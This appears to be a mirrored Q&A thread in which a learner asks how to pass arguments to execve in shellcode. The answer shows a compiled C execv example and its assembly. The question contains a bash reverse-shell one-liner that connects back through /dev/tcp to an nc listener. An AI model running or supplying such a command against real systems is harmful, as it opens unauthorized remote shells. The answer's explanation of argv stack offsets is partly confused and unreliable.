CODEWITHSUNDEEP
assemblyshellcodeexecve
user2296580
user2296580

Reputation: 21

pass arguments to execve program in shellcode

I'm having a go at learning assembly and writing shellcode. I have a question about execve and passing arguments to the program it will execute.

I have working code to execute a bash shell but am unsure of the input format of execve to pass additional arguments to it. Can I do stdin stdout redirects too? I wanted to create a reverse tcp connection with this type of command line:

/bin/bash -i >& /dev/tcp/192.168.1.4/1234 0>&1

Should the arguments be separated with NULL's? I got it to execute a shell but it didn't connect back to the listening nc.

I know this is an unusual way of doing this but I just wanted to try something different :-)

Cheers

Upvotes: 2

Views: 4731

Answers (1)

perror
perror

Reputation: 7386

The best way to know how to do is to compile an example and stop at assembly level. Lets take this example:

#include <unistd.h>

int
main ()
{
  char *program = "/bin/ls";
  char *args[3] = {"/bin/ls", "-l", "./"};

  execv(program, args);

  return 0;
}

When compiled with gcc -Wall -Wextra -S -o myexec.s myexec.c you can read in myexec.s:

        .file   "myexec.c"
        .section        .rodata
.LC0:
        .string "/bin/ls"
.LC1:
        .string "-l"
.LC2:
        .string "./"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        pushq   %rbp
        movq    %rsp, %rbp
        subq    $32, %rsp
        movq    $.LC0, -8(%rbp)
        movq    $.LC0, -32(%rbp)
        movq    $.LC1, -24(%rbp)
        movq    $.LC2, -16(%rbp)
        leaq    -32(%rbp), %rdx
        movq    -8(%rbp), %rax
        movq    %rdx, %rsi
        movq    %rax, %rdi
        call    execv
        movl    $0, %eax
        leave
        ret

So, the list of arguments of the command line is composed of a list of strings and, the first argument is the path to the executable file (-8(rbp)), then each argument is passed through a pointer to its string: argv[0] = -16(%rbp), argv[1] = -24(%rbp), argv[2] = -32(%rbp), ... and so on.

So, you just have to have the addresses of each string and stack it (in the proper order) onto the stack before calling execv.

Upvotes: 1

Related Questions